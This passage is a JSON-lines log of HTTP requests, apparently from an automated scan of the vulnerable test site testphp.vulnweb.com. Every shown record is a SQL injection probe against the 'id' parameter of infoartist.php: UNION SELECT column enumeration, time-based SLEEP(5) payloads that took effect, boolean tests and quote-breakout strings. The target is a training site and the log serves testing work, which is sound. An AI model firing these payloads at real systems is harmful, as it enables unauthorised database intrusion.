2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-\",\"time\":\"344.693227ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:26.913590781Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-\",\"time\":\"341.816618ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:26.980556669Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-\",\"time\":\"343.604036ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:26.983978107Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-\",\"time\":\"352.088065ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:27.030756591Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-\",\"time\":\"343.348912ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:27.196405581Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-\",\"time\":\"339.245477ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:30.48316211Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20RLIKE%20%28SELECT%206847%20FROM%20%28SELECT%28SLEEP%285%29%29%29dTCI%29--%20XsdU\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20RLIKE%20%28SELECT%206847%20FROM%20%28SELECT%28SLEEP%285%29%29%29dTCI%29--%20XsdU\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20RLIKE%20%28SELECT%206847%20FROM%20%28SELECT%28SLEEP%285%29%29%29dTCI%29--%20XsdU\",\"time\":\"5.356502707s\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":2,\"status_code\":200,\"content_length\":23,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:30.606220792Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-\",\"time\":\"341.035067ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:30.651377126Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20RLIKE%20%28SELECT%207214%20FROM%20%28SELECT%28SLEEP%285%29%29%29DgJM%29%23\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20RLIKE%20%28SELECT%207214%20FROM%20%28SELECT%28SLEEP%285%29%29%29DgJM%29%23\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20RLIKE%20%28SELECT%207214%20FROM%20%28SELECT%28SLEEP%285%29%29%29DgJM%29%23\",\"time\":\"5.353853361s\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":2,\"status_code\":200,\"content_length\":23,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:30.695935874Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-\",\"time\":\"341.26448ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:31.443817431Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-\",\"time\":\"348.725626ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:31.445664213Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-\",\"time\":\"343.600335ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:31.447938533Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-\",\"time\":\"356.428682ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:31.469063409Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-\",\"time\":\"343.106527ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:32.189027917Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-\",\"time\":\"338.807584ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:35.397196548Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-\",\"time\":\"347.786011ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:35.397357238Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-\",\"time\":\"343.022405ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:35.685225111Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20-\",\"time\":\"355.970695ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:36.408023704Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20-\",\"time\":\"357.524255ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":207,\"lines\":21,\"status_code\":200,\"content_length\":1343,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:36.437053605Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20-\",\"time\":\"356.986736ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:36.437293073Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL--%20-\",\"time\":\"354.888077ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:36.501199488Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%22..%2C%27.%29%29%29%2C\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%22..%2C%27.%29%29%29%2C\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%22..%2C%27.%29%29%29%2C\",\"time\":\"344.903285ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:36.513677281Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%27%20AND%206311%3D6311%20AND%20%27zdnL%27%3D%27zdnL\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%27%20AND%206311%3D6311%20AND%20%27zdnL%27%3D%27zdnL\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%27%20AND%206311%3D6311%20AND%20%27zdnL%27%3D%27zdnL\",\"time\":\"352.760612ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:36.556461271Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%27%29%20AND%206311%3D6311%20AND%20%28%27vgPb%27%3D%27vgPb\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%27%29%20AND%206311%3D6311%20AND%20%28%27vgPb%27%3D%27vgPb\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%27%29%20AND%206311%3D6311%20AND%20%28%27vgPb%27%3D%27vgPb\",\"time\":\"358.084799ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:36.634297212Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%27%29%20AND%206865%3D4339%20AND%20%28%27UomA%27%3D%27UomA\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%27%29%20AND%206865%3D4339%20AND%20%28%27UomA%27%3D%27UomA\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%27%29%20AND%206865%3D4339%20AND%20%28%27UomA%27%3D%27UomA\",\"time\":\"354.666113ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:36.804998445Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%27bJmeVo%3C%27%22%3EUdOhxD\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%27bJmeVo%3C%27%22%3EUdOhxD\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%27bJmeVo%3C%27%22%3EUdOhxD\",\"time\":\"353.636153ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:36.8526958Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%27pHbDuC%3C%27%22%3EyQLWoa\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%27pHbDuC%3C%27%22%3EyQLWoa\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%27pHbDuC%3C%27%22%3EyQLWoa\",\"time\":\"350.565321ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:36.956689849Z\",\"